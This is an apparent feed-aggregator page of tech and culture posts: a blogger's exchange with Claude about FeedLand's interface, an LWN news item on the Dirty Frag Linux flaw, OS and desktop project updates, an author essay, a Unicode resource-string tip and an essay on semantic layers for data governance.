Thank you Pietro and Iain!

22:35

Claude just astounded me [Scripting News]

I say to Claude: btw, i would have been surprised if it was broken, that feature went in very quickly and i use it a fair amount. one of the two big pages in feedland is the Feed List page. here's a screen shot. maybe you can figure out what everything does??

Example of a Feed List page in FeedLand.

Claude retorts

  • Disclosure triangle — expands the row to show more about that feed (recent items, description, full URL).
  • Blue checkbox (checked) — subscription state. Checked = you're subscribed. Click to subscribe/unsubscribe.
  • Row number — just positional, 1..14 for this result set.
  • Feed title — clickable, opens the feed's own page (the other "big page" you mentioned).
  • Small tag icon next to the title — opens a categories editor for that subscription, lets you tag the feed into categories.
  • When column — last update time, with adaptive granularity: minutes for very recent ("21 mins", "26 mins"), day-of-week for the past few days ("Fri", "Tue", "Thu"), month+day after that ("Nov 22", "Mar 29"), and presumably full date for old stuff.
  • Ct column — subscriber count for the feed. Every row shows 2 because feedland.social is small. Worth noting: this is the same ct that the SQL we just touched uses for order by ct desc — the column visible in the UI is the sort key.
  • Green circle "i" — info popup, probably feed metadata (URL, description, last build, maybe owner).
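The adaptive granularity Claude describes for the When column could be implemented along these lines; the thresholds and formats below are guesses for illustration, not FeedLand's actual rules:

```python
from datetime import datetime, timedelta

def adaptive_when(then: datetime, now: datetime) -> str:
    """Format a timestamp more coarsely the older it is."""
    age = now - then
    if age < timedelta(hours=1):
        return f"{int(age.total_seconds() // 60)} mins"
    if age < timedelta(days=7):
        return then.strftime("%a")                  # day of week, e.g. "Fri"
    if age < timedelta(days=365):
        return f"{then.strftime('%b')} {then.day}"  # e.g. "Nov 22"
    return then.strftime("%m/%d/%Y")                # full date for old items
```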

Claude is very very smart. And I guess it got the right answers. A lot of work went into the design.

The only thing it didn't guess correctly about is what the other "big page" is. It's not the Feed Info page, it's the news page, a timeline or river.

Done for the day, my last words to Claude were -- FeedLand is an important product and we're going to do right by it.

22:07

Dirty Frag: a zero-day universal Linux LPE [LWN.net]

Hyunwoo Kim has announced the Dirty Frag security flaw, a local-privilege-escalation (LPE) vulnerability similar to the recently disclosed Copy Fail flaw:

Because the embargo has now been broken, no patches or CVEs exist for these vulnerabilities. After consultation with the linux-distros@vs.openwall.org maintainers, and at the maintainers' request, I am publicly releasing this Dirty Frag document.

As with the previous Copy Fail vulnerability, Dirty Frag likewise allows immediate root privilege escalation on all major distributions.

Kim, who discovered the flaw and had attempted a coordinated disclosure set for May 12, has released the code for an exploit, as well as an example script to remove the vulnerable modules. A full write-up, with the disclosure timeline, is also available. It's unknown at this time whether this is an example of parallel discovery or how the third party was able to disclose it prior to the end of the embargo. We will be following up as more information comes to light.

20:42

Redox gets partial window pixel updating, tmux, and more [OSnews]

Another month, another progress report, Redox, etc. etc., you know the drill by now. This past month Redox saw improved booting on real hardware by making sure the boot process continues even if certain drivers fail or become blocked. Thanks to some changes on the RISC-V side, running Redox on real RISC-V hardware has also improved. Furthermore, tmux has been ported to Redox, CPU time reporting has been improved, and Orbital, Redox’ desktop environment, gained support for partial window pixel updating, which should increase UI performance.

On top of that, there’s a brand new web user interface to browse Redox packages (x86-64, i586, ARM64 (aarch64), and RISC-V (riscv64gc)), as well as the usual list of improvements to the kernel, drivers, relibc, and many more areas of the operating system.

20:28

The Big Idea: Jill Rosenberg [Whatever]

While it may seem like fantasy is as far from the real world as possible, author Jill Rosenberg suggests that indulging in fantasies and fiction actually connects people instead of isolating them from reality. Dive in to the Big Idea for her newest release, Now I’m Photogenic and Other Stories I Tell Myself, and see if our desires are really just human nature.

JILL ROSENBERG:

People often think of fantasy and the imagination as ways to escape reality, but I think there’s a more complicated and fraught relationship between the two. What we long for, the ways we wish to escape—this grows out of our real experiences of the world. But the reverse is true as well: our “real” experiences are colored by our fantasies. 

We might, for example, wish to be an Olympic-level athlete, as one of my characters does, but this wish highlights the absence of her athletic talent, which may not have shown up as an absence if she’d never longed to be an elite athlete. That feeling of absence and desire drives her behavior, which changes her reality, and the resulting experience changes her understanding of herself and what she really wants.

Our imagination can’t free us from the world because our imagination is made from the world.  But it can alter the way we see things and what feels possible. The first story in my collection is called “The Logic of Imaginary Friends.” This is where I present this big idea most directly. A single mother is left lonely and longing when her eleven-year-old daughter goes to sleepaway camp for the first time, so she reunites with her imaginary friend from childhood.

It’s great at first, until one imaginary friend is not enough, no matter how she morphs him in her mind to meet her shifting needs and desires. The fantasies are fun, but not satisfying, and she begins to feel that she’s choosing this fantasy life over her life with her daughter, but does she have to choose between the two?

As a child, I used my imagination to revise reality. Every Thanksgiving I’d feel so excited for my cousins to visit. I’d imagine myself gregarious, irresistible, rehearsing all of the interactions I’d have, writing their dialogue and mine. But when they arrived, I could never be that person or get the response from them I wanted.

Later that night, however, I could rewrite the dialogue to be more plausible but equally thrilling, given what actually happened. That was always my favorite part of the holiday, alone in my room, taking what happened and transforming it into the holiday I longed for. But the bigger the gulf between my fantasies and reality, the less I was able to enjoy the fantasies or the reality.

It’s these competing desires that compelled me to write these stories: the desire to be known, seen, recognized, and special, to connect with those around us, and the desire to hide what makes us unique, to pretend we’re no different from everyone else.

On the one hand, my characters are often reminding themselves of their freedom. Maybe they really can be anything they want to be, but when they try to do it, out in the world, it’s not so easy. They can’t control reality or other people’s responses the way they can control their fantasies. But the more they shy away and hide from the real world, the more that fear of reality infects their fantasies, or, in the surreal stories, the events of their fantastical lives. As a result, their fantasies and their lives get weirder and worse. 

Of course, my strange characters and the unusual things that happen to my characters all stem from my own strangeness and my unusual thoughts and experiences. In my real life, I do not always feel like showcasing the ways in which I deviate from the norm, but I am happy and proud to put my strange and unusual characters out into the world because I do think that fiction shows us new and different ways of being. 

The role of fiction, even surreal fiction, is to bring us closer to the experience of being a human in the real world. That marriage between—and tension between—dream and reality is what I find most thrilling and ultimately satisfying in both my writing and my life.


Now I’m Photogenic and Other Stories I Tell Myself: Amazon|Barnes & Noble|Bookshop|Powell’s|Watchung Booksellers

Author socials: Website|Instagram

Read an excerpt of one story from the collection: The Logic of Imaginary Friends

19:56

Setting up a Sun Ray server on OpenIndiana Hipster 2025.10 [OSnews]

Time for another Sun Ray blog post! I’ve had a few people email me asking for help setting up a Sun Ray server over the last few months, and despite my attempts to help them get it going, there have been mixed results with running SRSS on OpenIndiana Hipster 2025.10.

My Sun Ray server is still on an earlier OI snapshot, so I figured it was about time to try to actually follow the new guides myself.

↫ The Iris System

Ever since spiraling down the Sun rabbit hole late last year, I’ve tried a few times now to get the x86 version of OpenIndiana and Oracle Solaris working on any of my machines, exactly for the purposes of setting up a modern Sun Ray server. Sadly, none of my machines are compatible with any illumos distribution or Oracle Solaris, so I’ve been shit out of luck trying to get this side project off the ground. My Ultra 45 is also not supported by any SPARC version of illumos or Oracle Solaris, so unless I buy even more hardware, my dream of a modern Sun Ray setup will have to wait.

Of course, virtualisation is an option for many, and that’s exactly what this particular guide is about: setting up OpenIndiana on a Proxmox virtual machine. I actually have a Proxmox machine up and running and could do this too, but I’m a sucker for running stuff like this on real hardware. Yes, that makes my life more complicated and difficult, and no, it’s not more noble or real or hardcore – it’s just a preference. Still, for normal people who pick up a Sun Ray or two on eBay for basically nothing, running OpenIndiana in a virtual machine is the smart, reasonable, and effective option.

19:49

Emacs Chat with Sacha Chua [Planet GNU]

Yesterday I joined Sacha Chua for a new episode of her Emacs Chat podcast, where we talked about Emacs and life. I gave a quick tour of my Emacs configuration, discussing at length my configuration for EXWM (the Emacs X Window Manager), among other topics like Emacs's facility for visually indicating buffer boundaries in the fringe (by setting indicate-buffer-boundaries) and my convenience configuration macros.

[ please watch the video in your favourite streaming media player ]​

The above video is provided with closed captions, and the below transcript is courtesy of Sacha, with minor fixes and formatting by me. I've included some of Sacha's screenshots from our chat; you can see the rest on the episode's page on Sacha's blog.

A few links from our chat:

It was a lot of fun - thanks again for having me, Sacha!

Take care, and so long for now.

Transcript

19:07

“My favorite device is a Chromebook, without ChromeOS” [OSnews]

If you’re sick of Chrome OS on your Chromebook, or can find a Chromebook for cheap somewhere but don’t actually want to use Chrome OS, have you considered postmarketOS?

Since I was kind of frustrated with ChromeOS, I decided to take a look at something that I knew had supported my Lenovo Duet 3 for some time: postmarketOS. For those who don’t know, postmarketOS is an Alpine Linux-based distro focused on replacing the original OS of old phones (generally running Android) with a “true” Linux distro. They also seem to support some Chromebooks because of their unique architecture and, luckily, they support my device under the google-trogdor platform.

↫ kokada

PostmarketOS is aimed primarily at smartphones, but supports other form factors just fine as well. The Duet 3 is one of the tablet-like devices it supports, and it seems most things work quite well. In fact, judging by the postmarketOS wiki, quite a few Chromebooks have good support, and with Chromebooks being cheap and a dime a dozen on eBay and similar auction sites, it seems like a great way to get started with what is trying to become a true Linux for smartphones.

18:21

When you upgrade your resource strings to Unicode, don’t forget to specify the L prefix [The Old New Thing]

Some time ago, I discussed how the Resource Compiler defaults to CP_ACP, even in the face of subtle hints that the file is UTF-8.

After yet another incident of Visual Studio secretly changing the file encoding from 1252 to UTF-8 and breaking all non-ASCII strings, combined with Azure DevOps and Visual Studio simply ignoring encoding changes when showing diffs, a colleague decided to solve the problem once and for all by using explicit Unicode escapes \x#### to represent non-ASCII characters. That way, it doesn’t matter whether the file encoding is 1252 or UTF-8 because the two code pages agree on the common ASCII subset.

What used to be

IDS_AWESOME "That’s great!"

was changed to

IDS_AWESOME "That\x2019s great!"

Unfortunately, the resulting string that appeared on screen was

That 19s great!

What went wrong?

If you are encoding Unicode into your string, you have to put an L prefix on the quoted string. Otherwise, the \xABCD sequence is interpreted as an 8-bit \xAB escape sequence, followed by two literal characters CD. In this case, the \x2019 was interpreted as \x20 (which encodes a space) followed by the literal characters 19, resulting in the string That␣19s great!.
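To make the parsing difference concrete, here is a small Python model of the two escape-parsing rules described above: at most two hex digits after \x in a narrow string, up to four in an L-prefixed wide string. The helpers `parse_narrow` and `parse_wide` are hypothetical illustrations of that rule, not Resource Compiler APIs.

```python
import re

def parse_narrow(s: str) -> str:
    # Narrow string rule: \xAB consumes exactly two hex digits as one
    # 8-bit character; any further digits are literal characters.
    return re.sub(r'\\x([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1), 16)), s)

def parse_wide(s: str) -> str:
    # Wide (L-prefixed) string rule: \xABCD consumes up to four hex
    # digits as one UTF-16 code unit.
    return re.sub(r'\\x([0-9A-Fa-f]{1,4})',
                  lambda m: chr(int(m.group(1), 16)), s)

print(parse_narrow(r"That\x2019s great!"))  # That 19s great!  (\x20 = space)
print(parse_wide(r"That\x2019s great!"))    # That’s great!    (\x2019 = ’)
```

Running both on the same source text reproduces the bug: the narrow parse emits a space followed by the stray "19", while the wide parse yields the intended apostrophe.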

The correct conversion includes the L prefix.

IDS_AWESOME L"That\x2019s great!"

The post When you upgrade your resource strings to Unicode, don’t forget to specify the L prefix appeared first on The Old New Thing.

16:07

[$] A new era for memory-management maintainership [LWN.net]

On April 21, Andrew Morton let it be known that he intends to begin stepping away from the maintainership of the kernel's memory-management subsystem — a responsibility he has carried since before memory management was even seen as its own subsystem. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, one of the first sessions in the memory-management track was devoted to how the maintainership would be managed going forward. There are a lot of questions still to be answered.

15:21

An update on KDE's Union style engine [LWN.net]

Arjen Hiemstra has published an article on the status of the Union project: a single system to support all of KDE's technologies used for styling applications.

The work on Union's Breeze implementation has progressed to the point where it is very hard to distinguish whether or not you are running the Union version. We have also tested with a bunch of applications and made sure that any differences were fixed. So we are at a stage where we need to get Union into the hands of more people, both to get extra people testing whether there are any major issues and to have interested people creating new styles.

This means that with the upcoming Plasma 6.7 release, we plan to include Union. Discussion is currently ongoing whether we will enable it by default, but even if not there will be a way to try it out.

See Hiemstra's introductory article on Union, published in February 2025, for more about the project and its creation. Plasma 6.7 is expected to be released in mid-June.

14:56

Link [Scripting News]

Why did Twitter win? Because the RSS developers wouldn't work with each other. Thus subscribing to a feed was complicated. In Twitter, it was one click to subscribe, and another to unsub. You could see who your friends subscribed to, again -- one click to subscribe. And eventually that grew into a list of suggestions of people to follow. RSS had none of that because the RSS devs refused to work with each other. The development of RSS-based news products stopped, and pretty soon Twitter's stopped too. And thus news technology on the web remained frozen for two decades. We are getting another chance. The social media space is a highly disappointing wreck. Users are interested in new ideas, as long as they're fun and new, esp in relation to using AI tools. But it won't be open if we can't get it together any better than we could the first time around. You have to do things that help the web, and thus help your competitors. If you don't, if we don't, there will just be another Twitter, owning the users, and they'll probably sell out to a billionaire a lot sooner than Twitter did. At some point we'll realize if we want something new we have to work with each other. Otherwise you get Elon II, III etc.

14:35

Security updates for Thursday [LWN.net]

Security updates have been issued by AlmaLinux (dovecot, fence-agents, freeipmi, git-lfs, image-builder, kernel, libsoup, osbuild-composer, and python-tornado), Debian (apache2, libdatetime-timezone-perl, lrzip, tzdata, and wireshark), Fedora (dovecot, forgejo-runner, gh, gnutls, krb5, nano, pdns, pyOpenSSL, squid, vim, and xorg-x11-server-Xwayland), Mageia (graphicsmagick, kernel-linus, krb5-appl, libexif, libtiff, nano, nginx, ntfs-3g, opam, perl-Net-CIDR-Lite, perl-Starlet, perl-Starman, tcpflow, and virtualbox), Oracle (dovecot, fence-agents, freeipmi, image-builder, kernel, libcap, LibRaw, libsoup, openssh, osbuild-composer, python, python-tornado, python3, systemd, thunderbird, and tigervnc), SUSE (containerd, curl, erlang, flatpak, java-11-openjdk, java-21-openjdk, java-25-openjdk, liblxc-devel, libpng12, libthrift-0_23_0, openCryptoki, openexr, openssl-3, python3, python311-social-auth-core, rclone, skim, and thunderbird), and Ubuntu (apache2, coin3, editorconfig-core, insighttoolkit, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17, linux-hwe-6.17, linux-oracle, linux-realtime, linux-realtime-6.17, linux-azure, linux-azure-6.17, linux-oem-6.17, linux-azure-5.15, linux-gcp-6.8, nghttp2, python-dynaconf, slurm-wlm, swish-e, and webkit2gtk).

13:42

CodeSOD: Failing to Fail [The Daily WTF]

Russell F (previously) sends us a small one today. It's not just a representative line, it's a representative comment. More than that, it's a true confession. Russell wrote some code, you see, and the logic was confusing. So, a co-worker added a comment to explain what the code was doing:

'This is *supposed* to fail. If it fails to fail, it throws a failure message

Russell writes:

I have to confess that this one is my fault. The comment was added by one of my coworkers to clarify what I was doing, and made me realize how stupid I'd been.

"Failing to plan is planning to fail" becomes "failing to fail is failure message".

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

13:21

The Best Risk Mitigation Strategy in Data? A Single Source of Truth [Radar]

Every data leader has a version of this story. A regulatory audit surfaces a metric that doesn’t match across systems. A board member catches conflicting revenue numbers in two reports presented back-to-back. An AI tool generates a recommendation based on data that hasn’t been governed since the analyst who built it left the company two years ago. The specifics change, but the pattern doesn’t: Somewhere in the stack, data risk turned into business risk, and nobody saw it coming.

In my first article, I covered what a semantic layer is and why it matters. In my second, I spoke with early adopters about what happens when you actually build one. This piece tackles a different angle: The semantic layer as a risk mitigation strategy. Not risk in the abstract, compliance-framework sense, but the practical, operational risk that quietly drains organizations every day—bad numbers reaching decision-makers, sensitive data reaching the wrong people, and metric changes that never fully propagate.

Three risks hiding in plain sight

Data risk tends to concentrate in three areas, and most organizations are exposed in all of them simultaneously.

The first is accuracy. Inaccurate data leading to bad decisions is the oldest problem in analytics, and it hasn’t gone away. It’s gotten worse. As organizations add more tools, more dashboards, and more AI-powered applications, the surface area for error expands. A revenue metric defined one way in a Tableau workbook, another way in a Power BI model, and a third way in a Python notebook isn’t just an inconvenience. It’s a liability. When leadership makes a strategic decision based on a number that turns out to be wrong—or, more commonly, based on a number that’s one version of right—the downstream consequences are real: misallocated resources, missed targets, eroded trust in the data team.

The second is governance and access. Most organizations have some framework for controlling who sees what data. In practice, those controls are scattered across warehouses, BI tools, individual dashboards, shared drives, and cloud storage buckets. Each system has its own permissions model, its own admin interface, and its own gaps. The result is a patchwork that’s expensive to maintain and nearly impossible to audit with confidence. Sensitive data finds its way into a dashboard it shouldn’t be in—not because someone acted maliciously, but because the governance surface area is too large to manage consistently.

The third is change management. A CFO decides that ARR should exclude trial customers starting next quarter. In theory, that’s a single metric change. In practice, it’s a scavenger hunt. That ARR calculation lives in a warehouse view, two Tableau workbooks, a Power BI model, an Excel report that someone on the FP&A team maintains manually, and now the new AI analytics tool that pulls directly from the data lake. Some of those get updated. Some don’t. Three months later, someone notices the numbers don’t match and the cycle starts again. The risk isn’t that the change was wrong—it’s that the change was never fully implemented.

These three risks—accuracy, governance, and change management—aren’t independent. They compound. An ungoverned metric that’s defined inconsistently and can’t be updated in one place is a ticking clock. The question isn’t whether it causes a problem, it’s when.

The legacy approach: more people, more tools, more problems

The traditional response to data risk has been to throw structure at it—and structure usually means people and process.

The most common pattern is the BI analyst as gatekeeper. Critical metrics, reports, and dashboards are managed by a centralized team. Need a new report? Submit a request. Need a metric change? Submit a request. Need to understand why two numbers don’t match? Submit a request and wait. This model exists because organizations don’t trust their data enough to let people self-serve, and for good reason—without a governed foundation, self-service creates chaos. But the gatekeeper model has its own costs. It’s slow. It creates bottlenecks. It’s expensive to staff. And performance is inconsistent—the quality of the output depends entirely on which analyst picks up the ticket and which tools they prefer.

Governance gets its own layer of complexity. Organizations deploy access controls across their data warehouse, BI platforms, file storage, and application layer—each with different permission models, administrators, and audit capabilities. Quality reporting, lineage, and business ownership tracking create additional tooling, complexity, and management overhead. Maintaining consistency across all of these systems is resource-intensive, and the more tools you add, the harder it gets. Most organizations know their governance has gaps. They just can’t find them all.

The combination of centralized BI teams and sprawling governance frameworks produces a predictable outcome: large, slow-moving data organizations that spend more time fixing and maintaining the infrastructure than actually delivering data or insight. When everything is managed manually across dozens of tools, problems don’t grow linearly—they grow exponentially. Every new dashboard, data source, or BI tool adds another surface to govern, another place where logic can diverge, another potential point of failure. The legacy approach doesn’t scale. It just gets more expensive.

The semantic approach: govern once, access everywhere

The semantic layer offers a fundamentally different model for managing data risk. Instead of distributing control across every tool in the stack, it consolidates it.

Start with accuracy and change management because the semantic layer addresses both with the same mechanism: A single location for all metric definitions, business logic, and calculations. When ARR is defined once in the semantic layer, it’s defined once everywhere. Tableau, Power BI, Excel, Python, your AI chatbot—they all reference the same governed definition. When the CFO decides to exclude trial customers, that change happens in one place and propagates automatically to every downstream tool. No scavenger hunt. No version that got missed. No analyst discovering three months later that their workbook is still running the old logic. And when that same CFO wants to know how we calculated that same metric several years ago? Semantic layers are driven by version control by default, allowing for seamless versioning across key metrics.
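The "define once, propagate everywhere" mechanism can be sketched in a few lines. This is a minimal, hypothetical illustration, not any vendor's semantic-layer API: `Metric`, `MetricRegistry`, and the ARR SQL fragments are invented for the example, and a real product would persist definitions in version control rather than in memory.

```python
from dataclasses import dataclass, field

@dataclass
class Metric:
    name: str
    sql: str                 # the governed calculation, stored in one place
    description: str         # self-documenting metadata lives with the metric
    version: int = 1
    history: list = field(default_factory=list)

class MetricRegistry:
    """Single source of truth: every tool resolves metrics through here."""
    def __init__(self):
        self._metrics = {}

    def define(self, metric: Metric):
        self._metrics[metric.name] = metric

    def update(self, name: str, new_sql: str, note: str):
        # Versioned by default: the old definition is retained, so you can
        # answer "how did we calculate this two years ago?"
        m = self._metrics[name]
        m.history.append((m.version, m.sql, note))
        m.sql = new_sql
        m.version += 1

    def get(self, name: str) -> Metric:
        # Tableau, Power BI, Excel, Python, or an AI agent would all call
        # this one entry point, so an update propagates to every consumer.
        return self._metrics[name]

registry = MetricRegistry()
registry.define(Metric("arr", "SUM(subscription_value)",
                       "Annual recurring revenue"))
# The CFO's change happens once, here, instead of in five scattered tools:
registry.update("arr",
                "SUM(subscription_value) FILTER (WHERE NOT is_trial)",
                "Exclude trial customers starting next quarter")
```

Every downstream consumer that asks the registry for "arr" now gets version 2 automatically; the scavenger hunt across workbooks and notebooks disappears because there is nothing else to update.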

This same centralization transforms governance. Instead of managing access controls across a warehouse, three BI platforms, a shared drive, and an application layer, organizations can align governance around the semantic layer itself. It becomes the single access point for governed data. Users connect to the semantic layer and pull data into the tool of their choice, but the permissions, definitions, and business logic are all managed in one place. The governance surface area shrinks from dozens of systems to one.

But the semantic layer does something else that the legacy approach can’t: it makes data self-documenting. In a traditional environment, the context around data—what a metric means, why certain records are excluded, how a calculation works—lives in the heads of analysts, in scattered documentation, or nowhere at all. The semantic layer captures that context as structured metadata alongside the models, columns, and metrics themselves. Field descriptions, metric definitions, relationship mappings, business rules—all of it is documented where the data lives, not in a wiki that nobody updates. This is what makes genuine self-service possible. When the data carries its own context, users don’t need to submit a ticket to understand what they’re looking at (and AI agents can read it in for contextual understanding at scale).

The practical result is a shift from centralized gatekeeping to federated, hub-and-spoke delivery. The semantic layer is the hub: governed, documented, consistent. The spokes are the teams and tools that consume it. A finance analyst pulls data into Excel. A data scientist queries it in Python. An AI agent accesses it via MCP. They all get the same numbers, definitions, and governance—without a centralized BI team manually ensuring consistency across every output.

Risk reduction, not risk elimination

The semantic layer doesn’t eliminate data risk. The underlying data still needs to be clean, well-structured, and maintained—as every practitioner I’ve spoken with has confirmed, garbage in still produces garbage out. And organizational alignment around metric definitions requires leadership commitment that no software can substitute for.

But the semantic layer changes the economics of data risk. Instead of scaling risk management by adding more people and more governance tools, you reduce the surface area that needs to be managed. Fewer places where logic can diverge. Fewer systems to audit. Fewer opportunities for a metric change to get lost in translation. The problems don’t disappear, but they become containable—manageable in one place rather than scattered across the entire stack.

For organizations serious about AI-driven analytics, this matters more than ever. AI tools need governed, contextualized data to produce trusted outputs. The semantic layer provides that foundation—not just as a nice-to-have for consistency, but as critical risk infrastructure for an era where the cost of bad data is accelerating.

One definition. One access point. One place to govern. That’s not just a better architecture. It’s a better risk strategy.

Feeds

Feed | RSS | Last fetched | Next fetched after
@ASmartBear XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
a bag of four grapes XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Ansible XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Bad Science XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Black Doggerel XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Blog - Official site of Stephen Fry XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Charlie Brooker | The Guardian XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Charlie's Diary XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Chasing the Sunset - Comics Only XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Coding Horror XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
Comics Archive - Spinnyverse XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Cory Doctorow's craphound.com XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Cory Doctorow, Author at Boing Boing XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
Ctrl+Alt+Del Comic XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Cyberunions XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
David Mitchell | The Guardian XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Deeplinks XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
Diesel Sweeties webcomic by rstevens XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Dilbert XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Dork Tower XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Economics from the Top Down XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Edmund Finney's Quest to Find the Meaning of Life XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
EFF Action Center XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Enspiral Tales - Medium XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Events XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Falkvinge on Liberty XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Flipside XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Flipside XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
Free software jobs XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
Full Frontal Nerdity by Aaron Williams XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
General Protection Fault: Comic Updates XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
George Monbiot XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Girl Genius XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
Groklaw XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
Grrl Power XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
Hackney Anarchist Group XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
Hackney Solidarity Network XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://blog.llvm.org/feeds/posts/default XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://calendar.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://eng.anarchoblogs.org/feed/atom/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://feed43.com/3874015735218037.xml XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://flatearthnews.net/flatearthnews.net/blogfeed XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
http://fulltextrssfeed.com/ XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
http://london.indymedia.org/articles.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&amp;_render=rss XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
http://planet.gridpp.ac.uk/atom.xml XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
http://shirky.com/weblog/feed/atom/ XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://thecommune.co.uk/feed/ XML 11:28, Wednesday, 13 May 12:13, Wednesday, 13 May
http://theness.com/roguesgallery/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
http://www.baen.com/baenebooks XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
http://www.godhatesastronauts.com/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
http://www.tinycat.co.uk/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://anarchism.pageabode.com/blogs/anarcho/feed/ XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
https://broodhollow.krisstraub.comfeed/ XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://debian-administration.org/atom.xml XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://elitetheatre.org/ XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://feeds.feedburner.com/Starslip XML 11:56, Wednesday, 13 May 12:38, Wednesday, 13 May
https://feeds2.feedburner.com/GeekEtiquette?format=xml XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://hackbloc.org/rss.xml XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://kajafoglio.livejournal.com/data/atom/ XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
https://philfoglio.livejournal.com/data/atom/ XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://pixietrixcomix.com/eerie-cutiescomic.rss XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://pixietrixcomix.com/menage-a-3/comic.rss XML 11:28, Wednesday, 13 May 12:12, Wednesday, 13 May
https://propertyistheft.wordpress.com/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://requiem.seraph-inn.com/updates.rss XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
https://studiofoglio.livejournal.com/data/atom/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://thecommandline.net/feed/ XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://torrentfreak.com/subscriptions/ XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://web.randi.org/?format=feed&type=rss XML 11:49, Wednesday, 13 May 12:32, Wednesday, 13 May
https://www.dcscience.net/feed/medium.co XML 11:21, Wednesday, 13 May 12:10, Wednesday, 13 May
https://www.DropCatch.com/domain/steampunkmagazine.com XML 11:35, Wednesday, 13 May 12:16, Wednesday, 13 May
https://www.DropCatch.com/domain/ubuntuweblogs.org XML 11:14, Wednesday, 13 May 12:00, Wednesday, 13 May
https://www.DropCatch.com/redirect/?domain=DyingAlone.net XML 11:49, Wednesday, 13 May 12:36, Wednesday, 13 May
https://www.freedompress.org.uk:443/news/feed/ XML 11:49, Wednesday, 13 May 12:37, Wednesday, 13 May
https://www.goblinscomic.com/category/comics/feed/ XML 11:28, Wednesday, 13 May 12:08, Wednesday, 13 May
